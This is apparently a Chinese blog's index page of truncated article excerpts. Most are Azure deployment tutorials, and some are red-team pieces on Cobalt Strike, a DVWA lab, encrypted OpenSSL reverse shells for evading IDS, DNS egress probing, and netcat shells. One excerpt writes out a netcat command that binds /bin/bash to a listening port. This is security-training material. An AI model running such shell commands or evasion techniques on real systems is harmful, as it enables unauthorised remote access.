【简介】 AzureDataStudio是一种跨平台的数据库工具，适合在Windows、macOS和Linux上使用本地和云数据平台的数据专业人员，AzureDataStudio利用IntelliSense、代码片段、源代码管理集成和集成终端提供新式编辑器体验,在本文中将会介绍到如何通过AzureDataStudio随时随地的来在本地计算机或云中查询、设计和管理数据库及数据仓库 【操作步骤】 一.创建AzureSQLDatabase数据库 1.进入到“SQL部署”选项页面。 2.在SQL数据库下，将资源类型设置为单一数据库，然后选择创建。 3.在CreateSQLDatabase表...

【简介】 AzureCDN即内容分发网络（AzureContentDeliveryNetwork，CDN）是建立并覆盖在承载网上，由不同区域的服务器组成的分布式网络。将源站资源缓存到全球各地的边缘服务器，供用户就近获取，降低源站压力，本篇文章将会讲解如何对AzureContentDeliveryNetwork配置终结点以缓存静态网址中的内容。 【操作步骤】 一.创建CDN内容分发网络 1.在Azure门户控制台中，输入”CDN”关键字对“FrontDoor和CDN配置文件”进行查找 2.进入到FrontDoor和CDN配置文件页面中，点击创建第一个“FrontDoor和CDN配置文件...

【简介】 我们都知道像SQL注入、跨站点脚本攻击(XSS)之类的恶意攻击以及OWASP发现的十大威胁都可能会导致服务中断或数据丢失，让Web应用程序所有者受到巨大威胁。那么如何有效的解决OWASPTOP10中的Web威胁呢？我们在本篇中将会给大家介绍到如何利用AzureFrontDoor的Web应用程序防火墙来对常见的WEB威胁进行防御，AzureFrontDoor上的WAF是一个全球性的集中式解决方案。它部署在全球各地的Azure网络边缘位置。启用了WAF的Web应用程序会检查FrontDoor在网络边缘传送的每个传入请求，在恶意攻击进入虚拟网络之前，WAF会阻止这些攻击靠近攻击源。WAF...

【简介】 AzureSQL数据库是托管在Azure中的关系数据库即服务(DBaaS)，属于平台即服务(PaaS)的行业类别,借助SQLServer，我们可以使用需要大量配置（本地或Azure虚拟机）的内置特性和功能。使用SQL数据库时，我们可以随用随付，并可选择纵向扩展或横向扩展以获得更大的功率而不会中断,本文的主要内容是介绍AzureSQLDatabase的创建、使用、管理等相关实践操作，快速的带领大家熟悉操作MicrosoftAzureSQLDatabase数据库。 【操作步骤】 一.创建MicrosoftAzureSQL数据库 1.浏览到“选择SQL部署”选项页面。 2.在SQL数...

【简介】 Seafile是由国内团队开发的一个国际化的开源云存储软件项目，目前据说已有10万左右的用户，典型的机构用户包括比利时的皇家自然科学博物馆、德国的Wuppertal气候、能源研究所等等。Seafile同时提供了客户端和服务器端软件免费下载，任何个人或公司都能搭建属于自己的私有文件同步服务。 【前期文章】 【MicrosoftAzure的1024种玩法】一.一分钟快速上手搭建宝塔管理面板]             【MicrosoftAzure的102...

【简介】 ApacheGuacamole是无客户端远程桌面网关。它支持标准协议，例如VNC，RDP和SSH。我们称其为无客户端，因为不需要插件或客户端软件。多亏了HTML5，在服务器上安装了鳄梨调味酱之后，只需使用Web浏览器即可访问桌面。 【操作步骤】 一.创建VirtualMachines 1.1创建资源组 ①Azure资源组是在其中部署和管理Azure资源的逻辑容器。必须在创建虚拟机前创建资源组，通过如下命令执行创建名为myResourceGroupVM的资源组 azgroupcreate--namemyResourceGroupVM--locationeastus ②执行结果如...

【简介】 AzureDNS是DNS域的托管服务，它使用MicrosoftAzure基础结构提供名称解析。通过在Azure中托管域，可以使用与其他Azure服务相同的凭据、API、工具和计费来管理DNS记录。 一.什么是DNS？ 域名系统DNS(DomainNameSystem)是因特网使用的命名系统，用来把便于人们使用的机器名字转换成为IP地址。域名系统其实就是名字系统。为什么不叫“名字”而叫“域名”呢？这是因为在这种因特网的命名系统中使用了许多的“域(domain)”，因此就出现了“域名”这个名词。“域名系统”明确地指明这种系统是应用在因特网中。下图中详细描述了DNS解析的整个过程...

【简介】 CobaltStrike是一款使用java编写，C/S架构的商业渗透软件，适合多人进行团队协作，可模拟APT做模拟对抗，进行内网渗透，是一个为对手模拟和红队行动而设计的平台，主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动，本文将介绍在AzureCloud中安装部署Cobaltstrike内网渗透工具。 【CobaltStrike的特点】 丰富的payload生成模块：可生成exe,dll,powershell,hta,图片捆绑,badUSB,vba宏木马,以及shellcode等； 钓鱼攻击及探针模块：自动化挂马链接生成,自动化钓鱼及探针； 渗透攻击模块：浏览器进程代...

【简介】 DVWA一个用来进行安全脆弱性鉴定的PHP/MySQLWeb应用，为安全专业人员测试自己的专业技能和工具.本篇教程利用Azurecloud手动搭建了一套DVWA漏洞靶场供安全人员测试练习使用 一.创建AzureVM虚拟机 二.远程连接云服务器 2.1使用远程工具登陆到服务器中 三.搭建LAMP集成环境 3.1执行如下命令搭建LAMP环境 yuminstall-yhttpdhttpd-develmariadbmariadb-servermariadb-libsmariadb-develphpphp-mysqlphp-gdphp-ldapphp-odbcphp-pe...

【简介】 一.创建AzureVM虚拟机 二.远程连接云服务器 2.1使用远程工具登陆到服务器中 2.2检查内核版本 安装Docker需要是Linux内核要3.10以上，使用uname-a命令检查当前内核版本 三.配置yum源 3.1备份当前yum源 使用如下命令对当前的yum源进行备份 cd/etc/yum.repos.d 　mkdirrepos_bak　　建立备份使用的文件夹 　mv.reporepos_bak备份 执行完毕以后，如下图所示 3.2添加微软源 cat>>/etc/yum.repos.d/microsoft-prod.repo<&lt...

【简介】 PostgreSQL是一种对象-关系型数据库管理系统，是完全的事务安全性数据库，完整地支持外键、联合、视图、触发器和存储过程(并支持多种语言开发存储过程)。它支持了大多数的SQL:2008标准的数据类型，也支持存储二进制的大对象，如图片、声音和视频，它对很多高级开发语言都有原生的编程接口及各种文档,本教程将带着大家在MicrosoftAzure云端轻松构建部署PostgreSQL数据库。 【操作步骤】 一.创建VirtualMachines 1.1创建资源组 ①Azure资源组是在其中部署和管理Azure资源的逻辑容器。必须在创建虚拟机前创建资源组，通过如下命令执行创建名为m...

【简介】 MediaWiki是全球最著名的开源wiki程序，运行于PHP+MySQL环境。MediaWiki从2002年2月25日被作为维基百科全书的系统软件，并有大量其他应用实例。MediaWiki的开发得到维基媒体基金会的支持。MediaWiki是建立wiki网站的首选后台程序，国内的灰狐维客等站点都采用这套系统。 【操作步骤】 一.创建VirtualMachines 1.1创建资源组 ①Azure资源组是在其中部署和管理Azure资源的逻辑容器。必须在创建虚拟机前创建资源组，通过如下命令执行创建名为myResourceGroupVM的资源组 azgroupcreate--name...

【文章简介】 AzureCloudShell是一个用于管理Azure资源的、可通过浏览器访问的交互式经验证shell。它使用户能够灵活选择最适合自己工作方式的shell体验，本篇文章主要针对LinuxVirtualMachines进行生命周期管理(包括启动、停止、重启等) 【AzureCloudShell功能介绍及限制】 功能介绍AzureCloudShell是一个用于管理Azure资源的、可通过浏览器访问的交互式经验证shell。它使用户能够灵活选择最适合自己工作方式的shell体验，无论是Bash还是PowerShell。 条件限制 CloudShell在按会话按用户提供的临...

【文章简介】 AzureCloudShell是一个用于管理Azure资源的、可通过浏览器访问的交互式经验证shell。它使用户能够灵活选择最适合自己工作方式的shell体验，无论是Bash还是PowerShell。 【AzureCloudShell功能介绍及限制】 功能介绍AzureCloudShell是一个用于管理Azure资源的、可通过浏览器访问的交互式经验证shell。它使用户能够灵活选择最适合自己工作方式的shell体验，无论是Bash还是PowerShell。 条件限制 CloudShell在按会话按用户提供的临时主机上运行 CloudShell在20分钟没有交互活动后...

在实战攻防对抗中，使用常规反弹shell会有一个缺点，那就是所有通过shell传输的流量都是以明文的方式发送的，可以被安全防护设备（如IDS、IPS等）获取到通信传输的数据内容，会导致被触发告警拦截，红队人员会使用一种加密的反弹shell方式，对传输的数据内容进行混淆加密，这里我们使用OpenSSL来进行加密反弹shell，本次实验环境如图1-1所示。 图1-1  OpenSSL反弹shell实验拓扑图 1）首先在使用OpenSSL反弹shell之前，需要对攻击机进行配置，手动执行opensslreq-x509-newkeyrsa:2048-keyoutkey.pem-...

DNS（DomainNameSystem）即域名解析系统，可将域名解析到对应访问IP。下面我们还是以系统自带命令为案例，进行演示DNS协议探测出网。 目录 一.Windows系统探测DNS协议出网 二.Linux系统探测DNS协议出网 1.Dig命令 2.Nslookup命令 前文推荐： 《红蓝攻防对抗实战》一.隧道穿透技术详解 《红蓝攻防对抗实战》二.内网探测协议出网之TCP/UDP协议探测出网 《红蓝攻防对抗实战》三.内网探测协议出网之HTTP/HTTPS协议探测出网 《红蓝攻防对抗实战》四.内网探测协议出网之ICMP协议探测出网 一.Windows系统探测DNS协议出网 在W...

目录 一.利用NC工具在linux执行反弹shell 1.Linux正向连接shell 2.利用Linux自带bash反弹Shell 一.利用NC工具在linux执行反弹shell 图1-1  Linux系统下实验拓扑图 1.Linux正向连接shell  假设在linux操作系统中想要获取反弹shell，其中反弹方式和上述演示的Windows操作系统不同，以两台linux服务器为例进行实验，实验环境如图1-1所示，使用正向连接shell的方式。 1）在目标服务器执行nc-lvp8888-e/bin/bash命令来开启目标服务器的监听，如图1-2所示，当有应...

目录 一.背景信息 二.操作步骤 三.相关总结 一.背景信息 在安装完kalilinux2020.1时，其操作系统默认语言为英文的，我们操作起来比较麻烦，为了以后操作方便起见，这边将其操作系统默认语言更改为中文。本篇文章将带领各位小伙伴们一起去将操作系统默认语言更改为中文 二.操作步骤 打开TerminalEmulator界面，查看当前系统语言为默认英文 在TerminalEmulator中执行dpkg-reconfigurelocales命令 注意：如果是root用户可直接执行dpkg-reconfigurelocales命令，如果是kali用户则需先切换成root...

一.网络安全现状趋势分析  根据中国互联网络信息中心（CNNIC）发布的第51次《中国互联网络发展状况统计报告》，截至2022年12月，我国网民规模为10.67亿，互联网普及率达75.6%。我国有潜力建设全球规模最大、应用渗透最强的数字社会。在此背景下，网络安全事关国家安全和经济社会稳定，事关广大人民群众利益。 当前，全球新一轮科技革命和产业变革深入推进，信息技术的发展日新月异，国内外的网络安全形势日趋严峻。2020～2023年，网络安全攻击持续增加，网络攻击威胁持续上升，各种网络攻击安全事件频发，网络所面临的安全威胁愈加多样、复杂、棘手。在互联互通的数字化链条中，任何一个漏洞或...

目录 一.利用NC工具在windows系统执行反弹shell 1.Windows正向连接shell 2.Windows反向连接shell  前文推荐： 《红蓝攻防对抗实战》一.隧道穿透技术详解 《红蓝攻防对抗实战》二.内网探测协议出网之TCP/UDP协议探测出网 《红蓝攻防对抗实战》三.内网探测协议出网之HTTP/HTTPS协议探测出网 《红蓝攻防对抗实战》四.内网探测协议出网之ICMP协议探测出网 《红蓝攻防对抗实战》五.内网探测协议出网之DNS协议探测出网 假设在内网环境中发现主机，通过漏洞获取到该主机控制权限，想要进一步对内网环境进行后续利用，这里可以通过反弹shel...